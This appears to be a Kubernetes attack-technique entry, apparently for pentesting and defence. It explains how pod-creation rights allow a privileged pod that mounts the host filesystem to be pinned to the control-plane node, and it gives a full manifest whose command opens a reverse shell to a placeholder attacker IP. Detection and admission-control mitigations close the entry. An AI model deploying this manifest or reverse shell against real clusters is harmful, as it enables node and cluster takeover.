Create a pod with significant privilege (
hostPath=/, etc) and schedule on a target node via setting the
|PermissionSet||Node||Container Orchestration Job, T1053.007|
Given the rights to create a new pod, an attacker can create a deliberately overprivileged pod within the cluster. This will grant the attacker full control over the node on which the pod is scheduled (via any number of container escape techniques). Additionally by setting the
nodeName selector in the pod spec to the control plane node, the attacker can gain root access to the control plane node and take over the entire cluster!
A role granting permission to create pods.
Check whether the current account has the ability to create pods, for example using kubectl:
Identify the name of the target (e.g control plane) node via:
Create a pod spec for our attack pod (N.B. If your target node is a control plane one you may need to add a toleration to this manifest to allow it to be scheduled):
apiVersion: v1 kind: Pod metadata: name: control-plane-attack labels: app: pentest spec: hostNetwork: true hostPID: true hostIPC: true containers: - name: control-plane-attack image: ubuntu securityContext: privileged: true volumeMounts: - mountPath: /host name: noderoot command: [ "/bin/sh", "-c", "--" ] args: [ "bash -i >& /dev/tcp/<attacker_ip>/<attacker_port> 0>&1" ] nodeName: < TARGET NODE NAME > volumes: - name: noderoot hostPath: path: /
Create the pod via kubectl:
- Monitor for pod creation from within an existing pod
- Monitor privileged pod creation with suspicious command arguments
Implement security policies
Use a pod security policy or admission controller to prevent or limit the creation of pods with additional powerful capabilities.